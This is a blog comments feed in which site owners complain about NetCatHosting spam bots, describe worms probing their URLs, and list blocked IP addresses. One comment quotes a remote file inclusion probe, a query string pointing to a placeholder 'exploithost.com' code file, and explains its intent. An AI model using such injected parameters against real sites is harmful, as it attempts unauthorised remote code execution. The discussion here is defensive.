Comments on: 9 months of useless Netcathosting spam http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/ Programming, Education, Computer Science Wed, 30 Sep 2020 08:31:44 -0400 http://wordpress.org/?v=2.8.4 hourly 1 By: Dave http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/comment-page-1/#comment-101027 Dave Wed, 23 Jan 2008 10:59:13 +0000 http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/#comment-101027 I see several bots that can't even submit the form to the correct URL. The blog posts are at /blog/yyyy/mm/dd/title_of_the_blog and the form action points to /blog/add_comment.php. Most of the bots end up submitting the form to /blog/yyyy/mm/dd/add_comment.php which doesn't exist. I actually had to set up a rewrite rule to send these requests to a capture script to make sure it wasn't a bug in my own blog code. I also see similar behaviour with what I suspect are worms. They're finding URLs on my site and adding something along the lines of ?var1=http://exploithost.com/exploitcode.txt to the end. The attempt is to have me include that URL with code that would normally include a local file and then execute it as PHP. The strange thing is that the "var1" part is often literally "var1" or just "var". Occasionally it's "?page=http...." or "?p=http..." but that's quite rare. It's like some script kiddy has downloaded the script but hasn't bothered configuring it for his own needs and has just left the default, placeholder variable names in the script. I get thousands of these. The other thing they do is if the URL doesn't end in ".html" or ".php" then they add "/index.php" before adding the "?var1=http..." part. Most of the URLs on my site are generated by RewriteRules that translate the URL into something completely different behind the scenes. This means that nearly all of the requests they make are for invalid URLs, many of which return a 302 redirect to the correct page. It seems there are unwashed masses in all walks of life. I see several bots that can’t even submit the form to the correct URL. The blog posts are at /blog/yyyy/mm/dd/title_of_the_blog and the form action points to /blog/add_comment.php. Most of the bots end up submitting the form to /blog/yyyy/mm/dd/add_comment.php which doesn’t exist. I actually had to set up a rewrite rule to send these requests to a capture script to make sure it wasn’t a bug in my own blog code.

I also see similar behaviour with what I suspect are worms. They’re finding URLs on my site and adding something along the lines of ?var1=http://exploithost.com/exploitcode.txt to the end. The attempt is to have me include that URL with code that would normally include a local file and then execute it as PHP.

The strange thing is that the “var1″ part is often literally “var1″ or just “var”. Occasionally it’s “?page=http….” or “?p=http…” but that’s quite rare. It’s like some script kiddy has downloaded the script but hasn’t bothered configuring it for his own needs and has just left the default, placeholder variable names in the script.

I get thousands of these.

The other thing they do is if the URL doesn’t end in “.html” or “.php” then they add “/index.php” before adding the “?var1=http…” part. Most of the URLs on my site are generated by RewriteRules that translate the URL into something completely different behind the scenes. This means that nearly all of the requests they make are for invalid URLs, many of which return a 302 redirect to the correct page.

It seems there are unwashed masses in all walks of life.

]]>
By: Hk45Tactical http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/comment-page-1/#comment-49070 Hk45Tactical Mon, 10 Sep 2007 19:21:14 +0000 http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/#comment-49070 We have received the same blog spammer bot hitting our store sites. I wrote some custom code to take a look at the source IP and reject based on several factors. I've since permanently banned several IP addresses based on repeated blog bombs and blog spamming attempts. The Ukraine IP addresses that we permanently blocked are as follows: 195.225.177.8 195.225.177.46 195.225.177.137 195.225.177.14 All of them trace back to NetCatHosting in Ukraine. The code that checks for these is pretty darn effective, as it now spots blog spammers and automatically adds them to the blog spammer database and bans the ip, after specific checks are completed. I would be interested to know where I can direct our host to show them these IPs are flagged all over the place as known spammers. We have received the same blog spammer bot hitting our store sites. I wrote some custom code to take a look at the source IP and reject based on several factors.
I’ve since permanently banned several IP addresses based on repeated blog bombs and blog spamming attempts.
The Ukraine IP addresses that we permanently blocked are as follows:
195.225.177.8
195.225.177.46
195.225.177.137
195.225.177.14

All of them trace back to NetCatHosting in Ukraine.

The code that checks for these is pretty darn effective, as it now spots blog spammers and automatically adds them to the blog spammer database and bans the ip, after specific checks are completed.

I would be interested to know where I can direct our host to show them these IPs are flagged all over the place as known spammers.

]]>
By: Tony http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/comment-page-1/#comment-47614 Tony Thu, 06 Sep 2007 01:22:30 +0000 http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/#comment-47614 LOL Adam, obviously Waterloo students never do <a href="http://compsci.ca/blog/software-startups-success-and-failures/" title="Software startups: success and failures" rel="nofollow">stupid things</a> ;) LOL Adam, obviously Waterloo students never do stupid things ;)

]]>
By: Adam McKerlie http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/comment-page-1/#comment-47531 Adam McKerlie Wed, 05 Sep 2007 21:30:28 +0000 http://compsci.ca/blog/9-months-of-useless-netcathosting-spam/#comment-47531 Wow. So much for testing that their software works. They obviously never went to Waterloo or Guelph for CompSci ;) Wow. So much for testing that their software works. They obviously never went to Waterloo or Guelph for CompSci ;)

]]>